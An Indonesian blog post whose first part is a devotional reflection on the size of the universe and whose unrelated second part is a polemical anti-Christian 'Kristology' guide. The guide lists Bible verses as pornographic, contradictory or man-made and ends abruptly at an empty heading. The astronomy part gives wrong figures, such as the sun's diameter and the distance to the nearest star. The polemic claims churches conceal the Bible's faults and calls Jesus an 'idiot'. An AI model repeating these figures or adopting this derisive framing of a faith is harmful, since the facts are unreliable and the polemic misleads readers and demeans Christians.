Senin, 23 Mei 2011

Renungan Kita Atas Alam Semesta

Kalau kita  keluar pada malam hari dan mengarahkan pandangan kelangit, kalau langit sedang cerah, tentunya kita akan bisa melihat bintang-bintang bertaburan di angkasa raya
 Bintang Gemintang di malam hari

Pernahkah kita sekalian bayangkan bahwa bintang2 itu sebenarnya adalah matahari, seperti matahari yang kita miliki di tata surya kita. Karena begitu jauhnya jarak matahari itu dengann bumi kita, maka ia keliatan sangat kecil dan berkedip2. Tapi, sesungguhnya bintang itu adalah matahari. Bahkan banyak yang ukurannya jauh lebih besar dari matahari kita.
 Matahari kita

Matahari yang kita miliki ini diameternya sekitar 200 kali bumi. Isinya adalah gas hydrogen yang sedang bereaksi secara termonuklir menjadi gas helium. Sedangkan bintang2 itu ada yang berpuluh kali atau bahkan beratus kali dibandingkan dengan besarnya matahari kita. Yang paling besar yang pernah ditemukan bahkan mencapai sekitar 500 kali matahari, alias 100 ribu kali besarnya bumi yang kita diami
 Galaksi Bima Sakti di mana Matahari adalah titik kecil di dalamnya

Begitu besar ukurannya, tetapi keliatan demikian kecilnya. Ya, semua itu karena jarak bintang2 itu sangat jauh dari bumi. Contoh saja jika dalam ilmu astronomi mengatakan, jarak bintang itu sekitar 8 tahun cahaya. Apakah artinya? Artinya, cahaya saja membutuhkan waktu tempuh 8 tahun untuk menuju bintang yang paling dekat. Jadi kalau dikakulasikan dalam kilometer…..
Perbandingan Bintang Terbesar Vy Canis Dengan Matahari 

Kecepatan cahaya adalah 300.000 km per detik. Jadi kalau cahaya membutuhkan waktu 8 tahun untuk sampai ke bintang itu, berarti jaraknya adalah 8 th x 365 hari x 24 jam x 60 menit x 60 detik x 300.000 km = 75.686.400.000.000 km atau sekitar 75 triliun kilometer. Sungguh jarak yg tak terbayangkan dalam kehidupan kita!!
 Cahaya Bintang

Jumlah bintang di alam semesta ini triliunan. Setiap 100 miliar bintang membentuk gugusan yg bernama Galaksi. Gugusan bintang yg kita tempati ini bernama Galaksi Bimasakti. Di sebelah Bimasakti ini ada Andromeda dan seterusnya. Ada miliaran galaksi di jagad semesta ini. Dan yang lebih dasyat lagi, setiap 100 miliar galaksi membentuk gugusan galaksi yang disebut Super-Cluster, dan seterusnya. Jagad semesta ini belum diketahui batasannya
Galaksi Andromeda 

Berapakah jarak gugusan bintang2 itu? Bermacam2. Ada yang berjarak 100 tahun cahaya. Artinya cahaya saja membutuhkan waktu 100 tahun. Ada yang 1000 tahun cahaya. Ada juga yang 1 juta tahun cahaya. Dan yang paling jauh diketemukan oleh ilmuan jepang berjarak 10 miliar tahun cahaya. Ya. cahaya saja membutuhkan waktu 10 milyar tahun. Apalagi kita, usia kita tak ada artinya apa2 dibanding kan dengan kebesaran alam semesta ini.
 Galaksi-galaksi lainnya

Jadi pernahkah anda membayangkan, bahwa matahari yang kita liat ini adalah matahari yang kita liat 8 menit yang lalu? Bukan matahari yang sekarang. kenapa demikian? Ya. Karena sinar matahari memerlukan waktu 8 menit untuk mencapai bumi, yang berjarak 150 juta kilometer dari matahari. Berarti, matahari yang kita lihat pada saat itu adalah matahari 8 menit yang lalu! aneh bukan!? itu dikarenakan cahaya juga membutuhkan waktu untuk sampai ketempat tujuan
 Setiap titik ini adalah 1 gugusan bintang (galaksi) yang terdiri dari ribuan bintang gemintang

Tidak berbeda dengan bintang 2 yang berjarak lebih jauh lagi. Kalau kita sedang mengamati bintang berjarak 100 juta tahun cahaya, maka sebenarnya bintang yang sedang kita amati itu adalah kondisi 100 juta tahun yang lalu!!
Jadi dengan kenyataan seperti itu jika kita memandangi langit malam saat itu maka sebenarnya kita bukan melihat langit yang sekarang saja. Tetapi pada saat yang bersamaan kita sedang melihat langit sekarang, langit 1000 tahun yang lalu, langit 1 juta tahun yang lalu dan bahkan langit 10 miliar tahun yang lalu ……………. Masya allah……….
Inilah cahaya matahari kita (sumber energi utama di muka bumi ini) 

Kesimpulan :
Sungguh sebuah keajaiban besar di jagad raya yang merupakan sebuah maha karya dahsyat Allah S.W.T mari kita pertebal keimanan kita kepada-Nya....

CATATAN PANDUAN BAGI YANG INGIN MEMPELAJARI KRISTOLOGI

Berikut ini adalah sebagian informasi yang selama ini disembunyikan oleh gereja agar umat kristen / katholik tidak mempelajari alkitab mereka sendiri secara mendalam, apalagi sampai dengan membandingkan antar satu kitab dengan kitab lain, sangat dilarang keras.

INDEKS AL-KITAB, CEKIDOT:
Kitab agama ini adalah milik umat Kristiani, dikenal dengan sebutan Alkitab atau Bibel (Inggris : Bible, Jerman : Bijbel), terdiri dari dua bagian kitab, yaitu Kitab Perjanjian Lama (PL) dan Kitab Perjanjian Baru (PB). Di dalam Perjaniian Lama Tuhan pernah berfirman bahwa orang-oran Israel itu sangat durhaka dan hobi merubah-rubah kitab suci (baca: Kitab Mikha 3:1 - 12 dan Ulangan 31:27). Akibatnya, kitab suci ini menjadi bercampur-baur antara kebenaran ilahi dan kesalahan-kesalahan manusiawi yang ditulis oleh orang-orang yang tidak bertanggung jawab.
Maka Alkitab tidak boleh dibaca dengan doktrin yang harus diterima apa adanya bahwa Alkitab itu pasti baik dan benar, karena Tuhan telah mengaruniakan akal budi kepada setiap manusia. Akal budi inilah yang mendatangkan karunia (Amsal 13:15). Tanpa akal budi mengakibatkan kebodohan dan kebinasaan (Amsal 10:21). Gunakanlah akal untuk menguji dan menyaring Alkitab antara ayat-ayat firman Tuhan dan ayat-ayat buatan manusia. Sesuai dengan perintah berikut : "Ujilah segala sesuatu dan peganglah yang baik" (I Tesalonika 5: 2 1).
AYAT-AYAT ILLAHI :
Tuhan itu Esa (monotheisme), bukan Trinitas
  1. Tauhid Nabi Musa (Ulangan 4:35, Ulangan 6:4, Ulangan 32:39).
  2. Tauhid Nabi Daud (II Samuel 7:22, Mazmur 86:8).
  3. Tauhid Nabi Sulaiman (I Raja-raja 8:23).
  4. Tauhid Nabi Yesaya (Yesaya 43: 10-11, Yesaya 44:6,Yesaya 45:5-6, Yesaya 46:9).
  5. Tauhid Yesus (Markus 12:29, Yohanes 5:30, Yohanes 17:3).

Yesus bukan Tuhan dan tidak sama dengan Tuhan
  1. Yesus lebih kecil daripada Tuhan (Yohanes 10:29).
  2. Tuhan lebih besar dari pada Yesus (Yohanes 14:28).
  3. Yesus duduk di sebelah kanan Tuhan (Markus 16:19, Roma 8:4).
  4. Yesus berdiri di sebelah kanan Tuhan (Kisah Para Rasul 7:56).
  5. Allah tahu kapan datangnya kiamat, sedang Yesus tidak tahu (Matius 24:36).
  6. Yesus bersyukur kepada Tuhan (Matius ll:25, Lukas 10:21).
  7. Yesus berteriak memanggil Tuhan (Matius 27:46, Markus 15:34).
  8. Yesus menyerahkan nyawanya kepada Tuhan (Lukas 23:44-46, Yohanes 19:30).
  9. Yesus disetir oleh Tuhan (Yohanes 5:30).

Yesus adalah utusan Tuhan (Rasul Allah)
Dalil : Markus 9:37, Yohanes 5:24, 30,7:29,33,8:16,18,26,9:4,10:36,II:42,13:20,16:5, 17:3,8,23,25.

Tidak ada dosa waris dan Penebusan dosa
Para nabi Allah tidak ada yang mengajarkan Dosa Waris dan Penebusan Dosa. Risalah Allah yang dibawa oleh semua nabi-Nya itu pada hakekatnya sama saja, yaitu Tauhid dan amal shalih. Semua nabi menekankan adanya tanggung jawab individu atas segala perbuatan setiap manusia (Yehezkiel 18:20, Ulangan 24:16, Matius 16:27, Yeremia 31:29-30, II Tawarikh 25:4).
Nubuat akan datangnya seorang nabi akhir setelah Yesus
Dalam Alkitab masih dapat ditemukan nubuat-nubuat para nabi yang memberikan sinyalemen akan datangnya seorang nabi terakhir yang menutup keberadaan para nabi sebelumnya. Keberadaan nabi terakhir yang pamungkas ini sangat penting artinya untuk kesempurnaan ajaran Tuhan kepada manusia di muka bumi.
Namun, nubuat itu disampaikan dalam bentuk sandi-sandi bahasa yang dapat dipahami dengan penafsiran yang membutuhkan pemikiran akal yang tinggi.
Ayat-ayat yang dimaksud adalah :
  1. Ulangan 18:18-20, tentang nabi diluar bani Israel dengan ciri-ciri: nabi seperti musa, tidak mati terbunuh dan semua perkatannya terjadi.
  2. Habakuk 3:3 jo. Ulangan 33;1-3, tentang nabi yang berhasil menegakkan syariat agama di tanah Arab.
  3. Yesaya 29:12, nabi yang tidak bisa membaca.
  4. Yesaya 41:1-4, nabi yang bisa perang, punya keturunan dan sudah lama ditunggu-tunggu oleh bangsa yang tertindas sebagai pembebas dan penyelamat dari penindasan kaum yang zalim.
  5. Yesaya 42:1-4, nabi yang menegakkan hukum kepada bangsa-bangsa lain dan tidak pernah berteriak dengan suara nyaring.
  6. Yeremia 28:9, tentang nabi yang membawa damai.
  7. Kejadian 49: 1, 10 dan Matius 21: 42-43, nabi tersebut keturunan nabi Ismail.
  8. Yohanes 1: 19-25, datangnya setelah zaman Yahya dan Yesus.
  9. Yohanes 16:7-1 5, nabi yang mendapat julukan "Penolong yang lain" dengan ciri-ciri: manusia biasa, memiliki gelar ‘penghibur' dan 'al-amin/orang benar jujur terpercaya', tidak berkata-kata dari dirinya sendiri dan memuliakan nabi Isa dengan alaihisalam.
  10. Dan lain-lain.


AYAT-AYAT BUATAN MANUSIA :
Ayat-ayat Porno (cabul)
  1.  Yehezkiel 23: 1-21, ayat-ayat jorok tentang seksual.
    Diceritakan di dalamnya penyimpangan seksual yang sangat berbahaya bagi perkembangan psikologis bila dibaca oleh anak-anak di bawah umur. Ada kalimat-kalimat yang sangat cabul dengan menyebut buah dada, buah zakar, menjamah-jamah, memegang-megang, birahi, dan lain-lain.
  2. Yehezkiel 16: 22-38, ayat porno yang bugil-bugil.
“....Waktu engkau telanjang bugil sambil menendang nendang dengan kakimu .... (ay.22). “...dan menjual kecantikanmu menjadi kekejian dengan meregangkan kedua pahamu bagi setiap orang yang lewat, sehingga persundalanmu bertambah-tambah" (ay.25."Engkau bersundal dengan orang Mesir, tetanggamu, si aurat besar itu....."(ay.26). "engkau bersundal juga dengan orang Asyur, oleh karena engkau belum merasa puas ya, engkau bersundal dengan mereka, tetapi masih belum puas" (ay.28). "Betapa besar hawa nafsumu itu, demikianlah firman Tuhan ALLAH" (ay. 30). "....engkau yang memberi hadiah 1 umpan kepada semua yang mecintai engkau sebagai bujukan, supaya mereka dari sekitarmu datang kepadamu untuk bersundal" (ay. 33). Aku akan menyingkap auratmu di hadapan mereka, sehingga mereka melihatseluruh kemaluanmu: (ay.37).
  1. Ulangan 23: 1-2, Tuhan menyebut "Buah Pelir".
  2. Hosa 3: 1, nabi Hosea disuruh Tuhan untuk mencintai perempuan yang suka bersundal (pelacur) dan berzinah. Jika benar bahwa Tuhan pernah menyuruh nabi-Nya untuk mencintai pelacur, semua laki-laki akan rebutan menjadi nabi. Dan, semua wanita akan rebutan untuk menjadi pelacur, supaya dicintai oleh nabi Allah.
  3. Kidung agung 4:1-7, puisi rayuan yang memuji kecantikan dengan menyebut buah dada dan susu.
  4. Kejadian 38:8-9, kisah asal-usul onani (masturbasi) oleh leluhur Yesus.
  5. Kidung Agung 7:6-13. Puisi Kenikmatan Cinta yang memuji kecantikan dan cinta yang memakai kata-kata seksual, yakni keindahan buah dada dan keinginan untuk memegang-megang buah dada. "Sosok tubuhmu seumpama pohon korma dan buah dada gugusannya. Aku ingin memanjat pohon korma itu dan memegang gugusan gugusannya.Kiranya buah dadamu seperti gugusan anggur.

Pelecehan Alkitab (Bibel) kepada Tuhan
  1. Tuhan menyesal dan pilu hati? (Kejadian 6:5-6, Keluaran 32:14).
  2. Tuhan mengah-mengah, megap-megap, dan mengerang seperti perempuan yang melahirkan? (Yesaya 42:13).
  3. Roh Tuhan melayang-layang (terapung-apung) di atas permukaan air? (Kejadian 1:1-2).
  4. Tuhan jorok, menyuruh makan tahi? (Yehezkiel 4:12-1 5).
  5. Tuhan kelihatan alas kaki-Nya? (Keluaran 24:10).
  6. Tuhan merasa jenuh/jemu/bosan? (Yeremia 15:6).
  7. Tuhan petak umpet dengan Adam? ( Kejadian 3:8-10).
  8. Tuhan besanan dengan manusia? (Kejadian 6:2).
  9. Tuhan kalah dalam duel melawan Yakub? (Kejadian 32:28).
  10. Tuhan bersiul memanggil manusia? (Zakharia 10: 8).
  11. Tuhan bersuit? (Yesaya 7: 18, Yesaya 5: 26).
  12. Tuhan menengking? (Yeremia 25: 30)
  13. Tuhan lelah kepayahan dan kecapaian? (Keluaran 31: 17).
  14. Tuhan menyuruh mencintai pelacur? (Hosea 3:1).
  15. Tuhan kelihatan punggungnya-Nya? (Keluaran 3 3: 23).


Pelecahan Alkitab (Bibel) kepada Para Nabi Allah
  1. Nabi Nuh mabuk-mabukan sampai teler dan telanjang bugil (Kejadian 9: 18-27).
  2. Nabi Luth menghamili kedua putri kandungnya sendiri dalam dua malam secara bergiliran (Kejadian 19:30-38). Heboh ... !!! Skandal seks ayah dan anak kandung oleh nabi??
  3. Nabi Daud melakukan skandal seks dengan Batsyeba, istri anak buahnya sendiri. Setelah Batsyeba mengandung suaminya dibunuh oleh Daud, kemudian Batsyeba dinikahi Daud diboyong ke istana (II Samuel l l: 2-27).
  4. Ketika sudah tua, Nabi Daud tidur dengan perawan yang masih muda (I Raja-raja 1: 1-3).
  5. Nabi Yakub bekerja sama dengan ibu kandungnya untuk membohongi dan menipu ayah kandungnya, supaya Israel diberkati (Kejadian 27: 1-46).
  6. Yehuda (putra Nabi Yakub) menghamili menantunya sendiri (Kejadian 38: 13-19). Skandal seksa ayah dan menantu dalam kitab suci!?
  7. Absalom (putra Nabi Daud) memperkosa gundik ayahnya sendiri (11 Samuel 16: 21-23). Perselingkuhan anak dengan ibu (gundik ayah) dalam Kitab Suci?!
  8. Amnon (putra Daud) memperkosa saudara perempuannya (II Samuel 13: 7-14). Incest antara anak nabi dengan saudaranya sendiri ?!?
  9. Ruben (putra tertua Nabi Yakub) melakukan hubungan seks dengan Bilha, gundik ayahnya (Kejadian 35:22). Gundik ayah diperkosa anaknya sendiri ?!?
  10. Nabi Sulaiman (Salomo) tidak taat kepada Tuhan karena lebih mencintai 700 istri dan menyimpan 300 gundik (I Raja-raja 11:3) Mustahil ada nabi yang rakus wanita..
  11. Nabi Harun membuat dan menyembah patung emas (Keluaran 32:2-4).
  12. Nabi Isa (Yesus) orang bodoh, idiot, dan emosional. Pada waktu bukan musim buah ara, Yesus mengutuk pohon ara yang tidak berbuah (Markus ll: 12-14; bandingkan: Yohanes 2:4 dan Yohanes 7:8-10).
    Catatan : Nama-nama pezinah tersebut ada dalam silsilah yesus (Matius 1:1-17 dan Lukas 3:23-38).

Ayat-ayat yang tidak masuk akal (irasional)
  1. Anak lebih tua 2 tahun daripada ayahnya pada waktu II Tawarikh 21:5,20, Yoram berusia 32 tahun jadi raja dan memerintah Yerusalem selama 8 tahun lalu meninggal (pada usia 40 tahun). II Tawarikh 22: 1-2, Setelah Yoram meninggal, dia digantikan Ahazia, anaknya pada usia 42 tahun. Jadi, Ahazia lebih tua 2 tahun daripada ayahnya.
  2. Usia 11 tahun sudah tidak punya anak

Ahas berumur 20 tahun ketika naik dan memerintah kerajaan selama 16 tahun (II Raja-raja 16:2). Sepeninggal Ahas, tahta kerajaan diganti oleh Hizkia, anaknya (II Rajaraja 16: 20). Hizkia berusia 25 tahun waktu naik tahta menjadi raja (II Raja-raja 18: 2).
Jadi, dalam usia 11 tahun Ahaz sudah punya anak ??!!
  1. Tuhan salah hitung
Kejadian 46: 8-1 5, disebutkan daftar nama-nama bani Israel yang datang ke Mesir berjumlah 34 nama. Padahal pada ayat 1 5 disebutkan “Jadi seluruhnya, laki-laki dan perempuan, berjumlah 33 jiwa". Pakai Tuhan tidak pandai berhitung ??


Ayat-ayat yang mustahil dipraktekkan
  1. Hukum Sabat

Hari Sabat (Sabtu) adalah hari Tuhan yang harus dikuduskan. Pada hari itu setiap orang dilarang bekerja, dilarang memasang api di rumah (lampu, kompor, dan lain-lain) karena Sabat adalah hari perhentian penuh. Orang yang bekerja pada hari Sabtu harus dihukum mati (Keluaran 20:8-11,31:15,35:2-3).
Ayat ini mustahil dipraktekan di jaman modem. Siapa yang sanggup mengamalkan ? Siapa yang mau dibunuh apabila melanggar hukum Sabat ?
  1. Bunuh orang kafir dan musyrik!! (Ulangan 13: 6-9)
    Ayat ini memeiintahkan kewajiban membunuh orang yang mengajak menyembah tuhan selain Allah. Ayat ini tidak bisa diterapkan. Buktinya umat Yahudi dan Kristen tidak pernah membunuh umat Hindu, Budha, Kong Hu Chu, dan lain-lain.
  2. Dilarang memakai pakaian yang dibuat dari pada dua jenis bahan (Imamat 19: 19).
    Bila ayat ini diamalkan, maka manusia akan kembali kepada jaman primitif, ketinggalan jaman, ketinggalan gaya dan tidak modernis.
  3. Cungkil mata yang menyesatkan orang untuk berbuat dosa (Matius 5:29).
    Secara Letterlijk maupun Figuurlijk, ayat ini mustahil dipakai. Bila diterapkan, maka banyak orang Kristen menjadi buta.
  4. Potong kaki dan tangan orang yang menyesatkan ke arah dosa (Matiusl8:8-9)
    Secara Letterlijk maupun Figuurlijk, ayat ini mustahi dipakai. Bila diterapkan, maka banyak orang kristen menjadi pincang dan buntung.
  5. Dilarang melawan penjahat (Matius 5: 39-44)

Ayat ini mustahil dipraktekkan di masyarakat manapun. Bila ajaran ini diterapkan, maka menghancurkan tatanan sosial dan keamanan masyarakat. Apa jadinya di masyarakat apabila suatu kejahatan tidak dilawan ? Tidak melawan kejahatan berarti mendukung kejahatan. Bila kejahatan tidak dilawan, berarti mendukung kejahatan.
Bila kejahatan tidak dilawan, maka kriminalitas akan meningkat dan subur berkembang.
  1. Kasihilah musuhmu (Lukas 6: 27-29). Ajaran ini sangat menguntungkan penjajah.
  2. Dilarang membawa perbekalan, dilarang membawa dua helai baju dan dilarang membawa kasur dalam pedalanan (Matius 10:9-10). Kenyataannya, umat Kristen sendiri tak ada yang bisa mengamalkan ayat ini.
Ayat-ayat takhayul (mistis)
Simson (Inggris: Samson) adalah utusan Tuhan yang sakti mandraguna selama rambutnya tidak dicukur. (Hakim-hakim 16:1-22).
Diceritakan dalam kitab Hakim-hakim 16:1-22 bahwa Samson adalah utusan Tuhan yang sakti mandraguna. Dia bisa mencabut kedua daun pintu gerbang kota beserta kedua tiang dan semua palangnya, Ialu semuanya diletakkan di atas kedua bahunya dan dipindahkan ke puncak gunung (ay. 3). Tapi sayangnya dia jatuh cinta kepada seorang pelacur (wanita sundal) yang bernama Delila. Mala Delila disewa oleh raja Filistin dengan bayaran 1100 uang perak untuk mencari rahasia Samson (ay. 5)
Di atas pangkuan pelacur Delila, akhimya Samson tergoda rayuan dan bujukan sehingga membuka rahasia kesaktiannya. Bahwa selama rambut kepalanya tidak dicukur, maka seluruh kekuatannya akan musnah dan dia menjadi orang lemah (ay. 17). Maka setelah nabi Samson tertidur di atas pangkuan pelacur Delila, rambutnya dicukur. Lalu musnahlah seluruh kesaktiaan dan kekuatan Samson. (ay.19). Kemudian kedua mata Samson dicungkil sehingga jadilah Samson buta mata akibat rahasia kesaktiannya dicukur (ay. 21).
Cerita ini adalah cerita takhayul (mistik) yang biasanya berkembang di masyarakat primitif.
Ayat-ayat Diskrimatif
Perbuatan riba (rente) dilarang dilakukan kepada Israel, tapi boleh dilakukan kepada non Israel (Ulangan 23: 19-20).
Ayat ini jelas buatan orang Yahudi, sebab tidak mungkin Tuhan berlaku diskiiminatif dengan melarang mengambil bunga uang kepada bangsa Yahudi, sementara mengambil bunga kepada orang selain Yahudi diperbolehkan. Dan sangat bertentangan dengan kitab Keluaran 22: 25: “Jika engkau meminjamkan uang kepada salah seorang umat-Ku, orang miskin diantaramu, maka janganlah engkau berlaku sebagai penagih hutang terhadap dia: janganlah kamu bebankan bunga kepadanya".

Ayat-ayat Ramalan Bibel yang meleset tak terpenuhi
  1. Ramalan Paulus tentang kedatangan Yesus (I Tesalonika 4: 16-17).
    Dalam ayat ini Paulus meramalkan bahwa setelah kebangkitan Yesus dari kubur, dia dan seluruh pengikutnya yang masih hidup itu akan diangkat bersama-sama dengan Yesus dalam awan menyongsong Tuhan di angkasa. Ramalan ini tidak terpenuhi bukan Yesus yang menjemput Paulus, tapi pedang kaisar Nero yang memenggal leher Paulus di Roma tahun 64 M.
Ramalan Paulus ini tidak akan terjadi, meski dia diberi waktu 2000 tahun lagi untuk menunggu kegenapan nubuatnya.
  1. Ramalan kedatangan Yesus (Matius 10:23, 16:28, Markus 9:1 dan Lukas 9:27).
    Yesus menubuatkan bahwa dia dan kerajaan Allah akan datang sebelum para muridnya selesai mengunjungi kotakota Israel. Ramalan ini meleset jauh, sebab sampai saat ini Yesus belum juga turun datang kembali ke dunia. Padahal para murid Yesus sudah mati semua 2000 tahun yang Ialu.
  2. Hak keturunan Abraham (Kejadian 21: 12).
Dalam ayat ini Tuhan menubuatkan bahwa yang disebut keturunan Abraham adalah berasal dari Ishak. Nubuat ini meleset jauh besar, Sebab dalam I Tawarikh 1:28-30 Ismail juga disebut sebagai anak keturunan Abraham.
  1. Ramalan Tuhan Meleset (Yeremia 34:4-5)
Dalam ayat Tuhan berfirman bahwa Zedekia, raja Yehuda tidak akan mati oleh pedang, melainkan akan mati dengan damai. Nubuat ini meleset jauh, dalam kitab Yeremia 52: 10-11 diceritakan bahwa pada dalam akhir hayatnya Zedekia tewas ditangan raja Babel. Sebelum meninggal, mata Zedekia dibutakan, lalu dibelenggu dengan rantai tembaga. Kemudian ditaruh dalam rumah hukuman sampai meninggal.
  1. Nubuat Tuhan tidak terjadi (Yeremia 36: 30).
Dalam kitab Yeremia 36:30 Tuhan berfirman bahwa keturunan Yoyakim tidak ada yang naik tahta kerajaan Daud. Nubuat ini tenyata meleset. Diceritakan dalam kitab II Rajaraja 24: 6 bahwa sepeninggal Yoyakim, yang naik tahta menggantikannya adalah Yoyakin, anaknya.



AYAT-AYAT KONTRADIKSI :
Kontradiksi Perjanjian Lama
  1. Siapakah anak Daud yang kedua ?
  2. Di Yerusalem, Daud mengambil beberapa gundik atau tidak ?
  3. Berapa anak-anak Daud dari gundik di Yerusalem ?
  4. Di Kota mana Daud mengambil tembaga ?
  5. Siapa anak Tou yang diutus untuk mengucapkan selamatkepada Daud ?
  6. Dari orang bangsa saja Daud mengambil perak dan emas untuk Tuhan ?
  7. Siapakah panitera (sekretaris) Daud ?
  8. Berapakah tentara berkuda tawanan Daud ?
  9. Berapa ekor kuda kereta yang dibunuh Daud ?
  10. Yang dibunuh Daud, pasukan berkuda atau pasukan jalan kaki ?
    1. 40.000 pasukan berkuda (II Samuel 10:8).
    2. 40.000 pasukan berjalan kaki (I Tawarikh 19: 18).
  1. Kileab (II Samuel 3: 2-3).
  2. Daniel (I Tawarikh 3: 1)
  1. Ya! Daud mengambil beberapa gundik dan istrei (11 Samuel 5: 13-16).
  2. Tidak! Daud hanya mengambil beberapa isteri saja (I Tawarikh 14: 3-7).
  1. 11 orang (Samuel 5: 13-16).
  2. 13 orang (I Tawarikh 14 3-7).
  1. Betah dan Berotai (II Samuel 8: 8).
  2. Tibhat dan dari Kun (I Tawarikh 18: 8)
  1. Yoram (II Samuel 8: 10).
  2. Hadoram (1 Tawarikh 18: 9- 1 0)
  1. Aram (II Samuel 8: 11-12).
  2. Edom (I Tawarikh 18: 14-16).
  1. Seraya (II Samuel 8: 15-17).
  2. Sausa (I Tawarikh 18: 14-16).
  1. 1.700 orang (II Samuel 8: 4).
  2. 7.000 orang (I Tawarikh 18: 4).
  1. 700 ekor (II Samuel 10: 18).
  2. 7.000 ekor (I Tawarikh 19:18).
11.  Siapakah panglima musuh yang tewas di tangan Daud?
  1. Sobakh (II Samuel 10: 18).
  2. Sofakh (I Tawarikh 19: 18).
12.  Daud memerangi Israel atas hasutan Tuhan atau atas bujukan iblis ?
  1. Tuhan murka Ialu menghasut Daud (II Samuel 24: 1).
b.  Setan bangkit Ialu membujuk Daud (I Tawarikh 21:1)
13.  Siapakah kepala Triwira pengiring Yahudi ?
  1. Isyabaal, orang Hakhmoni (II Samuel 23: 8).
  2. Yasobam bin Hakhmoni (I Tawarikh 11:11).
14.  Kepala Triwira Daud membunuh berapa orang ?
  1. 800 orang (II Samuel 23:8).
  2. 300 orang (I Tawarikh 11:11).
15.  Berapakah angkatan perang Daud dari orang Israel ?
  1. 800 orang (II Samuel 24: 9).
  2. 1.100.000 orang (I Tawarikh 21:5).
16.  Berapakah angkatan perang Daud dari orang Yehuda ?
  1. 500.000 orang (11 Samuel 24:9).
  2. 470.000 orang (I Tawarikh 21:5).
17.  Berapakah kandang kuda milik Salomo (Sulaiman ?
  1. 40.000 kandang (I Raja-raja 4:26).
  2. 4.000 kandang (II Tawarikh 2:2).
18.  Berapa mandor pengawas kerajaan Salomo (Sulaiman)?
  1. 3.300 mandor (1 Raja-raja 5:16).
  2. 3.600 mandor (II Tawarikh 2:2).
19.  Berapa bat air di Bait Suci buatan Salomo ?
  1. 2.000 bat air (I Raja-raja 7:26).
  2. 3.000 bat air (II Tawarikh 4:5).
20.  Berapakah jumlah keturunan Yakub seluruhnya ?
  1. 66 jiwa (Kejadian 46:26).
  2. … jiwa (Keluaran 1:5).
21.  Yang diharamkan, kelinci ataukah kelinci hutan ?
  1. Kelinci (Imamat ll: 6).
  2. Kelinci hutan (Ulangan 14: 6).
22.  Yang haramkan, babi ataukah babi hutan ?
  1. Babi hutan (Ulangan 14: 8, Imamat ll: 7).
  2. Babi (Yesaya 66: 17).
23.  Berapa lama Yoyakhim menjadi raja di Yerusalem ?
  1. 3 bulan (11 Raja-raja 24: 8).
  2. 3 bulan 10 hari (11 Tawarikh 36: 9).
24.  Berapa lama Yesua dan Yoab yang pulang kembali ke Yerusalem dan Yehuda dari pembuangan Nebukadnezar ?
  1. 2.812 orang (Ezra 2:6).
  2. 2.818 orang (Nehemia 7:11).
25.  Berapa anak-anak Benyamin ?
  1. 10 orang (Kejadian 46:21).
  2. 5 orang (Bilangan 26:38-39).
  3. 3 orang (I Tawarikh 7:6).
  4. 5 orang (1 Tawarikh 8:1-5).
Komentar Silsilah anak Benyamin itu, semuanya tidak sama baik nama maupun jumlahnya.
26.  Berapa cucu Benyamin (anak-anak Bela) ?
  1. 5 orang (I Tawarikh 7:7).
  2. 9 orang (I Tawarikh 8:3-5).
  3. 2 orang (Bilangan 26:40).
Buka dan bacalah ayat yang dimaksud. Terlihat jelas bahwa semua nama dan jumlah cucu Benyamin tidak ada yang sama.
27.  Tuhan salah dalam batasan usia ?
  1. Tuhan membatasi umur manusia hanya 120 tahun saja "Berfirman Tuhan: "Roh-Ku tidak akan selama-lamanya tinggal di dalam manusia, karena manusia itu adalah daging, tetapi umurnya akan seratus dua puluh tahun saja" (Kejadian 6:3). "Maka berkatalah TUHAN,'Aku tidak memperkenankan manusia hidup selama-lamanya; mereka mahluk fana, yang harus mati. Mulai sekarang umur mereka tidak akan melebihi 120 tahun" (Kejadian 6:3, Alkitab Bahasa Indonesia Sehari-hari).
  2. Batasan usia dari Tuhan itu salah besar, karena banyak orang yang usianya melebihi 120 tahun. Adam hidup selama 930 tahun (Kej. 5:3-5), Set hidup selama 912 tahun (Kej. 5:6-8), Enos hidup selama 905 tahun (Kej.9-11), Keenam hidup selama 9 1 0 tahun (Kej. 5:12-14), Mahalaleel hidup selama 895 tahun (Kej. 5:15-17), Yared hidup selama 962 tahun (Kej. 5:18-20), Henokh hidup selama 365 tahun (Kej. 5:21-23), Metusalah hidup selama 969 tahun (Kej. 5:25-27), Lamekh hidup selama 777 tahun (Kej. 5:28-32), Nuh hidup selama 950 tahun (Kej. 9:29), Sem hidup selama 600 tahun (Kej. 11: 10-11), Arpakhsad hidup selama 438 tahun (Kej. 11:12-13), Selah hidup selama 433 tahun (Kej. ll: 14-15), Eber hidup selama 464 tahun (Kej. ll:16-17). Peleg hidup selama 239 tahun (Kej. ll:18-19), Rehu hidup selama 239 tahun (Kej.11: 22-21), Serug hidup selama 230 tahun (Kej. 11: 24-25), Sara hidup selama 127 tahun (Kej. 23: 1-2), Ismael hidup selama 137 tahun (Kej. 25:17), Nahor hidup selama 148 tahun (Kej. ll: 24-25), Yakub hidup selama 147 tahun (Kej. 47: 28), Lewi hidup selama 137 tahun (Kej. 6:15), Kehat hidup selama 133 tahun (Kej. 6:19), Harun hidup selama 123 tahun (BH 33:39), Ayub hidup selama 140 tahun (Ayub. 42: 16-17).
28. Tuhan menyesal atau tidak ?
a. Tuhan tidak punya sifat menyesal (I Samuel 15:29, Bilangan 23:19).
b. Tuhan menyesal dan pilu hati karena telah menciptakan manusia yang akhimya cenderung berbuatjahat di muka bumi (Kejadian 6:5-6). Tuhan menyesal karena telah Saul sabagai raja di Israel (I Samuel IS: 10-11, 35). Tuhan menyesal setelah mengacungkan tangan ke Yerusalem (II Samuel 24:16).Tuhan menyesal karena telah merancang malapetaka (Yeremia, 26:3, Yeremia 42:10, Keluaran 32: 14).
29. Tuhan bisa dilihat atau tidak ?
  1. Tuhan tidak bisa dilihat dan didengar (Yohanes 5: 37,I Timotius 1:17, I Timotius 6:16, Keluaran 33: 20, I Yohanes 4:12).
  2. Tuhan bisa dihhat dengan mata kepala (Keluaran 33:11), Kejadian 18:1, Yohanes 5:37), Keluaran 33:20; I Timotius 6:16, I Timotius 1: 17,I Yohanes 4:12, Kejadian 26:24).
  3. Tuhan kelihatan kaki-Nya (Keluaran 24:9-10).
  4. Tuhan kelihatan sedang duduk (Yesaya 6:1).
  5. Tuhan bisa dilihat dari jauh(Yeremia 31:3).


Sebenarnya masih ada ratusan lagi daftar kontradiksi dalam Perjanjian Lama. Tapi karena keterbatasan ruang muat, maka dalam indeks ini dicukupkan sampai disini daftar ayat kontradiksi dalam Perjanjian Lama. Untuk selengkapnya baca buku "Fakta Dan Data Kepalsuan Alkitab (Bibel)" yang akan segera terbit.




Kontradiksi Perjanjian Baru :
